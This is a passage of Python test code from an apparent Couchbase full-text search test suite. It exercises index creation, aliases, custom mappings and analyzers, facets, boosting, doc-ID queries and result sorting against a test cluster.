consistency_vectors=self.consistency_vectors
)
self.log.info("Hits: %s" % hits)
for i in xrange(self.consistency_vectors.values()[0].values()[0]):
self.async_perform_update_delete(self.upd_del_fields)
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=self._num_items,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
self.log.info("Hits: %s" % hits)
def test_match_consistency_error(self):
query = {"match_all": {}}
fts_node = self._cb_cluster.get_random_fts_node()
service_map = RestConnection(self._cb_cluster.get_master_node()).get_nodes_services()
# select FTS node to shutdown
for node_ip, services in service_map.iteritems():
ip = node_ip.split(':')[0]
node = self._cb_cluster.get_node(ip, node_ip.split(':')[1])
if node and 'fts' in services and 'kv' not in services:
fts_node = node
break
self.create_simple_default_index()
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=0,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
self.log.info("Hits: %s" % hits)
try:
from fts_base import NodeHelper
NodeHelper.stop_couchbase(fts_node)
for i in xrange(self.consistency_vectors.values()[0].values()[0]):
self.async_perform_update_delete(self.upd_del_fields)
finally:
NodeHelper.start_couchbase(fts_node)
NodeHelper.wait_service_started(fts_node)
self.sleep(10)
# "status":"remote consistency error" => expected_hits=-1
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=-1,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
ClusterOperationHelper.wait_for_ns_servers_or_assert([fts_node], self, wait_if_warmup=True)
self.wait_for_indexing_complete()
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=self._num_items,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
self.log.info("Hits: %s" % hits)
def test_match_consistency_long_timeout(self):
timeout = self._input.param("timeout", None)
query = {"match_all": {}}
self.create_simple_default_index()
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=0,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
self.log.info("Hits: %s" % hits)
tasks = []
for i in xrange(self.consistency_vectors.values()[0].values()[0]):
tasks.append(Thread(target=self.async_perform_update_delete, args=(self.upd_del_fields,)))
for task in tasks:
task.start()
num_items = self._num_items
if timeout is None or timeout <= 60000:
# Here we assume that the update takes more than 60 seconds
# when we use timeout <= 60 sec we get timeout error
# with None we have 60s by default
num_items = 0
try:
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=num_items,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors,
timeout=timeout)
finally:
for task in tasks:
task.join()
self.log.info("Hits: %s" % hits)
def index_utf16_dataset(self):
self.load_utf16_data()
try:
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, "default_index")
# an exception will most likely be thrown from waiting
self.wait_for_indexing_complete()
self.validate_index_count(
equal_bucket_doc_count=False,
zero_rows_ok=True,
must_equal=0)
except Exception as e:
raise FTSException("Exception thrown in utf-16 test :{0}".format(e))
def create_simple_alias(self):
self.load_data()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, "default_index")
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True)
hits, _, _, _ = index.execute_query(self.sample_query,
zero_results_ok=False)
alias = self.create_alias([index])
hits2, _, _, _ = alias.execute_query(self.sample_query,
zero_results_ok=False)
if hits != hits2:
self.fail("Index query yields {0} hits while alias on same index "
"yields only {1} hits".format(hits, hits2))
return index, alias
def create_query_alias_on_multiple_indexes(self):
#delete default bucket
self._cb_cluster.delete_bucket("default")
# create "emp" bucket
self._cb_cluster.create_standard_buckets(bucket_size=1000,
name="emp",
num_replicas=0)
emp = self._cb_cluster.get_bucket_by_name('emp')
# create "wiki" bucket
self._cb_cluster.create_standard_buckets(bucket_size=1000,
name="wiki",
num_replicas=0)
wiki = self._cb_cluster.get_bucket_by_name('wiki')
#load emp dataset into emp bucket
emp_gen = self.get_generator(dataset="emp", num_items=self._num_items)
wiki_gen = self.get_generator(dataset="wiki", num_items=self._num_items)
if self.es:
# make deep copies of the generators
import copy
emp_gen_copy = copy.deepcopy(emp_gen)
wiki_gen_copy = copy.deepcopy(wiki_gen)
load_tasks = self._cb_cluster.async_load_bucket_from_generator(
bucket=emp,
kv_gen=emp_gen)
load_tasks += self._cb_cluster.async_load_bucket_from_generator(
bucket=wiki,
kv_gen=wiki_gen)
if self.es:
# create empty ES indexes
self.es.create_empty_index("emp_es_index")
self.es.create_empty_index("wiki_es_index")
load_tasks.append(self.es.async_bulk_load_ES(index_name='emp_es_index',
gen=emp_gen_copy,
op_type='create'))
load_tasks.append(self.es.async_bulk_load_ES(index_name='wiki_es_index',
gen=wiki_gen_copy,
op_type='create'))
for task in load_tasks:
task.result()
# create indexes on both buckets
emp_index = self.create_index(emp, "emp_index")
wiki_index = self.create_index(wiki, "wiki_index")
self.wait_for_indexing_complete()
# create compound alias
alias = self.create_alias(target_indexes=[emp_index, wiki_index],
name="emp_wiki_alias")
if self.es:
self.es.create_alias(name="emp_wiki_es_alias",
indexes=["emp_es_index", "wiki_es_index"])
# run rqg on the alias
self.generate_random_queries(alias, self.num_queries, self.query_types)
self.run_query_and_compare(alias, es_index_name="emp_wiki_es_alias")
def index_wiki(self):
self.load_wiki(lang=self.lang)
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, "wiki_index")
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True,
zero_rows_ok=False)
def delete_index_then_query(self):
self.load_data()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, "default_index")
self._cb_cluster.delete_fts_index(index.name)
try:
hits2, _, _, _ = index.execute_query(self.sample_query)
except Exception as e:
# expected, pass test
self.log.info("Expected exception: {0}".format(e))
def drop_bucket_check_index(self):
count = 0
self.load_data()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, "default_index")
self._cb_cluster.delete_bucket("default")
self.sleep(20, "waiting for bucket deletion to be known by fts")
try:
count = index.get_indexed_doc_count()
except Exception as e:
self.log.info("Expected exception: {0}".format(e))
# at this point, index has been deleted,
# remove index from list of indexes
self._cb_cluster.get_indexes().remove(index)
if count:
self.fail("Able to retrieve index json from index "
"built on bucket that was deleted")
def delete_index_having_alias(self):
index, alias = self.create_simple_alias()
self._cb_cluster.delete_fts_index(index.name)
hits, _, _, _ = alias.execute_query(self.sample_query)
self.log.info("Hits: {0}".format(hits))
if hits >= 0:
self.fail("Query alias with deleted target returns query results!")
def delete_index_having_alias_recreate_index_query(self):
index, alias = self.create_simple_alias()
hits1, _, _, _ = alias.execute_query(self.sample_query)
self.log.info("Hits: {0}".format(hits1))
index.delete()
self.log.info("Recreating deleted index ...")
bucket = self._cb_cluster.get_bucket_by_name('default')
self.create_index(bucket, "default_index")
self.wait_for_indexing_complete()
hits2, _, _, _ = alias.execute_query(self.sample_query)
self.log.info("Hits: {0}".format(hits2))
if hits1 != hits2:
self.fail("Hits from alias before index recreation: %s,"
" after recreation: %s" %(hits1, hits2))
def create_alias_on_deleted_index(self):
self.load_employee_dataset()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, "default_index")
self.wait_for_indexing_complete()
from fts_base import INDEX_DEFAULTS
alias_def = INDEX_DEFAULTS.ALIAS_DEFINITION
alias_def['targets'][index.name] = {}
alias_def['targets'][index.name]['indexUUID'] = index.get_uuid()
index.delete()
try:
self.create_alias([index], alias_def)
self.fail("Was able to create alias on deleted target")
except Exception as e:
self.log.info("Expected exception :{0}".format(e))
def edit_index_new_name(self):
self.load_employee_dataset()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, 'sample_index')
self.wait_for_indexing_complete()
index.name = "new_index"
try:
index.update()
except Exception as e:
self.log.info("Expected exception: {0}".format(e))
def edit_index(self):
self.load_employee_dataset()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, 'sample_index')
self.wait_for_indexing_complete()
#hits, _, _, _ = index.execute_query(self.sample_query)
new_plan_param = {"maxPartitionsPerPIndex": 30}
self.partitions_per_pindex = 30
index.index_definition['planParams'] = \
index.build_custom_plan_params(new_plan_param)
index.index_definition['uuid'] = index.get_uuid()
index.update()
_, defn = index.get_index_defn()
self.log.info(defn['indexDef'])
def update_index_during_large_indexing(self):
"""
MB-22410 - Updating index with a large dirty write queue
items = some millions defined at run_time using items param
"""
rest = RestConnection(self._cb_cluster.get_random_fts_node())
self.load_employee_dataset()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, 'sample_index')
# wait till half the keys are indexed
self.wait_for_indexing_complete(self._num_items/2)
status, stat_value = rest.get_fts_stats(index_name=index.name,
bucket_name=bucket.name,
stat_name='num_recs_to_persist')
self.log.info("Data(metadata + docs) in write queue is {0}".
format(stat_value))
new_plan_param = self.construct_plan_params()
index.index_definition['planParams'] = \
index.build_custom_plan_params(new_plan_param)
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(10, "Wait for index to get updated...")
self.is_index_partitioned_balanced(index=index)
_, defn = index.get_index_defn()
self.log.info(defn['indexDef'])
# see if the index is still query-able with all data
self.wait_for_indexing_complete()
hits, _, _, _ = index.execute_query(self.sample_query,
zero_results_ok=False)
self.log.info("Hits: %s" % hits)
def delete_index_during_large_indexing(self):
"""
MB-22410 - Deleting index with a large dirty write queue is slow
items = 5M
"""
self.load_employee_dataset()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, 'sample_index')
# wait till half the keys are indexed
self.wait_for_indexing_complete(self._num_items/2)
index.delete()
self.sleep(5)
try:
_, defn = index.get_index_defn()
self.log.info(defn)
self.fail("ERROR: Index definition still exists after deletion! "
"%s" %defn['indexDef'])
except Exception as e:
self.log.info("Expected exception caught: %s" % e)
def edit_index_negative(self):
self.load_employee_dataset()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, 'sample_index')
self.wait_for_indexing_complete()
hits, _, _, _ = index.execute_query(self.sample_query)
new_plan_param = {"maxPartitionsPerPIndex": 30}
self.partitions_per_pindex = 30
# update params with plan params values to check for validation
index.index_definition['params'] = \
index.build_custom_index_params(new_plan_param)
index.index_definition['uuid'] = index.get_uuid()
try:
index.update()
except Exception as e:
self.log.info("Expected exception: %s" % e)
def index_query_beer_sample(self):
#delete default bucket
self._cb_cluster.delete_bucket("default")
master = self._cb_cluster.get_master_node()
self.load_sample_buckets(server=master, bucketName="beer-sample")
bucket = self._cb_cluster.get_bucket_by_name("beer-sample")
index = self.create_index(bucket, "beer-index")
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True,
zero_rows_ok=False)
query = {"match": "cafe", "field": "name"}
hits, _, _, _ = index.execute_query(query,
zero_results_ok=False,
expected_hits=10)
self.log.info("Hits: %s" % hits)
def index_query_custom_mapping(self):
"""
uses RQG for custom mapping
"""
# create a custom map, disable default map
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="custom_index")
if self.es:
self.create_es_index_mapping(index.es_custom_map,
index.index_definition)
self.load_data()
self.wait_for_indexing_complete()
if self._update or self._delete:
self.async_perform_update_delete(self.upd_del_fields)
if self._update:
self.sleep(60, "Waiting for updates to get indexed...")
self.wait_for_indexing_complete()
self.generate_random_queries(index, self.num_queries, self.query_types)
if self.run_via_n1ql:
n1ql_executor = self._cb_cluster
else:
n1ql_executor = None
self.run_query_and_compare(index, n1ql_executor=n1ql_executor)
def test_query_string_combinations(self):
"""
uses RQG framework minus randomness for testing query-string combinations of '', '+', '-'
{
mterms := [
[], // none
["+Wikipedia"], // one term
["+Wikipedia", "+English"], // two terms
["+the"], // one term (stop word)
["+the", "+English"], // two terms (one stop)
["+the", "+and"], // two terms (both stop)
]
sterms = [
[], // none
["Category"], // one term
["Category", "United"], // two terms
["of"], // one term (stop word)
["of", "United"], // two terms (one stop)
["of", "at"], // two terms (both stop)
]
nterms = [
[], // none
["-language"], // one term
["-language", "-States"], // two terms
["-for"], // one term (stop word)
["-for", "-States"], // two terms (one stop)
["-for", "-with"], // two terms (both stop)
]
}
"""
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.fts_queries = []
mterms = [[],
["+revision.text.#text:\"Wikipedia\""],
["+revision.text.#text:\"Wikipedia\"", "+revision.text.#text:\"English\""],
["+revision.text.#text:\"the\""],
["+revision.text.#text:\"the\"", "+revision.text.#text:\"English\""],
["+revision.text.#text:\"the\"", "+revision.text.#text:\"and\""]]
sterms = [[],
["revision.text.#text:\"Category\""],
["revision.text.#text:\"Category\"", "revision.text.#text:\"United\""],
["revision.text.#text:\"of\""],
["revision.text.#text:\"of\"", "revision.text.#text:\"United\""],
["revision.text.#text:\"of\"", "revision.text.#text:\"at\""]]
nterms = [[],
["-revision.text.#text:\"language\""],
["-revision.text.#text:\"language\"", "-revision.text.#text:\"States\""],
["-revision.text.#text:\"for\""],
["-revision.text.#text:\"for\"", "-revision.text.#text:\"States\""],
["-revision.text.#text:\"for\"", "-revision.text.#text:\"with\""]]
for mterm in mterms:
for sterm in sterms:
for nterm in nterms:
clause = (' '.join(mterm) + ' ' + ' '.join(sterm) + ' ' + ' '.join(nterm)).strip()
query = {"query": clause}
index.fts_queries.append(json.loads(json.dumps(query,ensure_ascii=False)))
if self.compare_es:
self.es.es_queries.append(json.loads(json.dumps({"query": {"query_string": query}},
ensure_ascii=False)))
self.run_query_and_compare(index)
def index_edit_and_query_custom_mapping(self):
"""
Index and query index, update map, query again, uses RQG
"""
fail = False
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="custom_index")
self.create_es_index_mapping(index.es_custom_map,index.index_definition)
self.load_data()
self.wait_for_indexing_complete()
self.generate_random_queries(index, self.num_queries, self.query_types)
try:
self.run_query_and_compare(index)
except AssertionError as err:
self.log.error(err)
fail = True
self.log.info("Editing custom index with new map...")
index.generate_new_custom_map(seed=index.cm_id+10)
index.index_definition['uuid'] = index.get_uuid()
index.update()
# updating mapping on ES is not easy, often leading to merge issues
# drop and recreate the index, load again
self.create_es_index_mapping(index.es_custom_map)
self.load_data()
self.wait_for_indexing_complete()
if self.run_via_n1ql:
n1ql_executor = self._cb_cluster
else:
n1ql_executor = None
self.run_query_and_compare(index, n1ql_executor=n1ql_executor)
if fail:
raise err
def index_query_in_parallel(self):
"""
Run rqg before querying is complete
turn off es validation
goal is to make sure there are no fdb or cbft crashes
"""
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="default_index")
self.load_data()
self.generate_random_queries(index, self.num_queries, self.query_types)
self.run_query_and_compare(index)
def load_index_query_all_in_parallel(self):
"""
Run rqg before querying is complete
turn off es validation
goal is to make sure there are no fdb or cbft crashes
"""
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="default_index")
self.sleep(20)
self.generate_random_queries(index, self.num_queries, self.query_types)
from threading import Thread
threads = []
threads.append(Thread(target=self.load_data,
name="loader thread",
args=()))
threads.append(Thread(target=self.run_query_and_compare,
name="query thread",
args=(index,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def index_edit_and_query_custom_analyzer(self):
"""
Index and query index, update map, query again, uses RQG
"""
fail = False
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="custom_index")
self.create_es_index_mapping(index.es_custom_map, index.index_definition)
self.load_data()
self.wait_for_indexing_complete()
self.generate_random_queries(index, self.num_queries, self.query_types)
try:
self.run_query_and_compare(index)
except AssertionError as err:
self.log.error(err)
fail = True
self.log.info("Editing custom index with new custom analyzer...")
index.update_custom_analyzer(seed=index.cm_id + 10)
index.index_definition['uuid'] = index.get_uuid()
index.update()
# updating mapping on ES is not easy, often leading to merge issues
# drop and recreate the index, load again
self.create_es_index_mapping(index.es_custom_map,index.index_definition)
self.wait_for_indexing_complete()
try:
if self.run_via_n1ql:
n1ql_executor = self._cb_cluster
else:
n1ql_executor = None
self.run_query_and_compare(index, n1ql_executor=n1ql_executor)
except AssertionError as err:
self.log.error(err)
fail = True
if fail:
raise err
def index_delete_custom_analyzer(self):
"""
Create Index and then update by deleting custom analyzer in use, or custom filter in use.
"""
error_msg = TestInputSingleton.input.param('error_msg', '')
fail = False
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="custom_index")
self.load_data()
self.wait_for_indexing_complete()
self.log.info("Editing custom index by deleting custom analyzer/filter in use...")
index.update_custom_analyzer(seed=index.cm_id + 10)
index.index_definition['uuid'] = index.get_uuid()
try:
index.update()
except Exception as err:
self.log.error(err)
if err.message.count(error_msg,0,len(err.message)):
self.log.info("Error is expected")
else:
self.log.info("Error is not expected")
raise err
def test_field_name_alias(self):
"""
Test the Searchable As property in field mapping
"""
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_child_field_to_default_mapping(field_name=self.field_name,
field_type=self.field_type,
field_alias=self.field_alias)
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(5)
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, matches, time_taken, status = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
self.log.info("Hits: %s" % hits)
def test_one_field_multiple_analyzer(self):
"""
1. Create an default FTS index on wiki dataset
2. Update it to add a field mapping for revision.text.#text field with 'en' analyzer
3. Should get 0 search results for a query
4. Update it to add another field mapping for the same field, with 'fr' analyzer
5. Same query should yield more results now.
"""
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_child_field_to_default_mapping(field_name=self.field_name,
field_type=self.field_type,
field_alias=self.field_alias,
analyzer="en")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(5)
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits1", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits)
self.log.info("Hits: %s" % hits)
index.add_analyzer_to_existing_field_map(field_name=self.field_name,
field_type=self.field_type,
field_alias=self.field_alias,
analyzer="fr")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(5)
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits2", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits)
self.log.info("Hits: %s" % hits)
def test_facets(self):
field_indexed = self._input.param("field_indexed",True)
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_child_field_to_default_mapping(field_name="type",
field_type="text",
field_alias="type",
analyzer="keyword")
if field_indexed:
index.add_child_field_to_default_mapping(field_name="dept",
field_type="text",
field_alias="dept",
analyzer="keyword")
index.add_child_field_to_default_mapping(field_name="salary",
field_type="number",
field_alias="salary")
index.add_child_field_to_default_mapping(field_name="join_date",
field_type="datetime",
field_alias="join_date")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(5)
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
try:
for index in self._cb_cluster.get_indexes():
hits, _, _, _, facets = index.execute_query_with_facets(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits)
self.log.info("Hits: %s" % hits)
self.log.info("Facets: %s" % facets)
index.validate_facets_in_search_results(no_of_hits=hits,
facets_returned=facets)
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: "+ err.message)
def test_facets_during_index(self):
field_indexed = self._input.param("field_indexed",True)
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.sleep(5)
index.add_child_field_to_default_mapping(field_name="type",
field_type="text",
field_alias="type",
analyzer="keyword")
if field_indexed:
index.add_child_field_to_default_mapping(field_name="dept",
field_type="text",
field_alias="dept",
analyzer="keyword")
index.add_child_field_to_default_mapping(field_name="salary",
field_type="number",
field_alias="salary")
index.add_child_field_to_default_mapping(field_name="join_date",
field_type="datetime",
field_alias="join_date")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(5)
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
while not self.is_index_complete(index.name):
zero_results_ok = True
try:
hits, _, _, _, facets = index.execute_query_with_facets(query,
zero_results_ok=zero_results_ok)
self.log.info("Hits: %s" % hits)
self.log.info("Facets: %s" % facets)
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: "+ err.message)
def test_doc_config(self):
# delete default bucket
self._cb_cluster.delete_bucket("default")
master = self._cb_cluster.get_master_node()
# Load Travel Sample bucket and create an index
self.load_sample_buckets(server=master, bucketName="travel-sample")
bucket = self._cb_cluster.get_bucket_by_name("travel-sample")
index = self.create_index(bucket, "travel-index")
self.sleep(10)
self.wait_for_indexing_complete()
# Add Type Mapping
index.add_type_mapping_to_index_definition(type="airport",
analyzer="en")
index.add_type_mapping_to_index_definition(type="hotel",
analyzer="en")
mode = self._input.param("mode", "type_field")
index.add_doc_config_to_index_definition(mode=mode)
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(15)
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True,
zero_rows_ok=False)
# Run Query
expected_hits = int(self._input.param("expected_hits", 0))
if not expected_hits:
zero_results_ok = True
else:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
try:
for index in self._cb_cluster.get_indexes():
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
self.log.info("Hits: %s" % hits)
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + err.message)
def test_boost_query_type(self):
# Create bucket, create index
self.load_data()
self.wait_till_items_in_bucket_equal(items=self._num_items/2)
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_type_mapping_to_index_definition(type="emp",
analyzer="keyword")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(15)
self.wait_for_indexing_complete()
zero_results_ok = False
expected_hits = 5
# Run Query w/o Boosting and compare the scores for Docs emp10000086 &
# emp10000021. Should be the same
query = {"query": "dept:Marketing name:Safiya"}
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
try:
for index in self._cb_cluster.get_indexes():
hits, contents, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Contents: %s" % contents)
score_before_boosting_doc1 = index.get_score_from_query_result_content(
contents=contents, doc_id=u'emp10000021')
score_before_boosting_doc2 = index.get_score_from_query_result_content(
contents=contents, doc_id=u'emp10000086')
self.log.info("Scores before boosting:")
self.log.info("")
self.log.info("emp10000021: %s", score_before_boosting_doc1)
self.log.info("emp10000086: %s", score_before_boosting_doc2)
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + err.message)
if not score_before_boosting_doc1 == score_before_boosting_doc2:
self.fail("Testcase failed: Scores for emp10000021 & emp10000086 "
"are not equal before boosting")
# Run Query w/o Boosting and compare the scores for Docs emp10000021 &
# emp10000086. emp10000021 score should have improved w.r.t. emp10000086
query = {"query": "dept:Marketing^5 name:Safiya"}
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, contents, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Contents: %s" % contents)
score_after_boosting_doc1 = index.get_score_from_query_result_content(
contents=contents, doc_id=u'emp10000021')
score_after_boosting_doc2 = index.get_score_from_query_result_content(
contents=contents, doc_id=u'emp10000086')
self.log.info("Scores after boosting:")
self.log.info("")
self.log.info("emp10000021: %s", score_after_boosting_doc1)
self.log.info("emp10000086: %s", score_after_boosting_doc2)
assert score_after_boosting_doc1 == score_after_boosting_doc2
assert score_before_boosting_doc1 < score_after_boosting_doc1
assert score_before_boosting_doc2 < score_after_boosting_doc2
def test_doc_id_query_type(self):
# Create bucket, create index
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_type_mapping_to_index_definition(type="emp",
analyzer="keyword")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(15)
self.wait_for_indexing_complete()
expected_hits = int(self._input.param("expected_hits", 0))
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
# From the Query string, fetch the Doc IDs
doc_ids = copy.deepcopy(query['ids'])
# If invalid_doc_id param is passed, add this to the query['ids']
invalid_doc_id = self._input.param("invalid_doc_id",0)
if invalid_doc_id:
query['ids'].append(invalid_doc_id)
# If disjuncts_query is passed, join query and disjuncts_query
# to form a new query string
disjuncts_query = self._input.param("disjuncts_query", None)
if disjuncts_query:
if isinstance(disjuncts_query, str):
disjuncts_query = json.loads(disjuncts_query)
new_query = {}
new_query['disjuncts'] = []
new_query['disjuncts'].append(disjuncts_query)
new_query['disjuncts'].append(query)
query = new_query
# Execute Query
zero_results_ok = False
try:
for index in self._cb_cluster.get_indexes():
n1ql_query = "select d, meta().id from default d where search(d, "+json.dumps(query)+") and type='emp'"
hits, contents, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Contents: %s" % contents)
# For each doc id passed in the query, validate the
# presence in the search results
for doc_id in doc_ids:
self.assertTrue(index.is_doc_present_in_query_result_content
(contents=contents, doc_id=doc_id),"Doc ID "
"%s is not present in Search results"
% doc_id)
if self.run_via_n1ql:
n1ql_results = self._cb_cluster.run_n1ql_query(query=n1ql_query)
self.assertTrue(index.is_doc_present_in_query_result_content
(contents=n1ql_results['results'], doc_id=doc_id),"Doc ID "
"%s is not present in N1QL Search results"
% doc_id)
score = index.get_score_from_query_result_content\
(contents=contents, doc_id=doc_id)
self.log.info ("Score for Doc ID {0} is {1}".
format(doc_id,score))
if invalid_doc_id:
# Validate if invalid doc id was passed, it should
# not be present in the search results
self.assertFalse(index.is_doc_present_in_query_result_content
(contents=contents, doc_id=invalid_doc_id),
"Doc ID %s is present in Search results"
% invalid_doc_id)
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + err.message)
def test_sorting_of_results(self):
self.load_data()
self.wait_till_items_in_bucket_equal(self._num_items/2)
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"disjuncts": [{"match": "Safiya", "field": "name"},
{"match": "Palmer", "field": "name"}]}
query = eval(self._input.param("query", str(default_query)))
if expected_hits:
zero_results_ok = False
if isinstance(query, str):
query = json.loads(query)
try:
for index in self._cb_cluster.get_indexes():
sort_params = self.build_sort_params()
hits, raw_hits, _, _ = index.execute_query(query = query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
sort_fields=sort_params,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Doc IDs: %s" % raw_hits)
if hits:
result = index.validate_sorted_results(raw_hits,
self.sort_fields_list)
if not result:
self.fail(
"Testcase failed. Actual results do not match expected.")
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + err.message)
def test_sorting_of_results_during_indexing(self):
self.load_data()
self.wait_till_items_in_bucket_equal(self._num_items/2)
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
#self.wait_for_indexing_complete()
self.sleep(5)
zero_results_ok = True
#expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"disjuncts": [{"match": "Safiya", "field": "name"},
{"match": "Palmer", "field": "name"}]}
query = eval(self._input.param("query", str(default_query)))
if isinstance(query, str):
query = json.loads(query)
try:
for index in self._cb_cluster.get_indexes():
while not self.is_index_complete(index.name):
sort_params = self.build_sort_params()
hits, raw_hits, _, _ = index.execute_query(query = query,
zero_results_ok=zero_results_ok,
sort_fields=sort_params,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Doc IDs: %s" % raw_hits)
#self.sleep(5)
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + err.message)
def test_sorting_of_results_on_non_indexed_fields(self):
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_child_field_to_default_mapping(field_name="name",
field_type="text",
field_alias="name",
analyzer="en")
